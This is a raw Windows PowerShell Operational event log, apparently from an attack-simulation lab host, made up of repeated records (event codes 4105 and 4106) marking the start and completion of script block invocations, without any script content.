Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478116
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478115
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478114
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478113
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478112
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478111
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478110
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478109
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478108
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478107
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478106
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478105
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478104
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478103
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478102
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478101
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478100
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478099
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478098
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478097
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478096
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478095
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478094
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478093
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478092
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478091
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478090
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478089
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478088
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478087
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478086
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478085
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478084
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478083
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478082
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478081
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478080
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478079
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478078
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478077
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478076
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478075
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478074
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478073
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478072
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478071
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478070
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478069
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478068
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478067
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478066
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478065
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478064
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478063
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478062
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
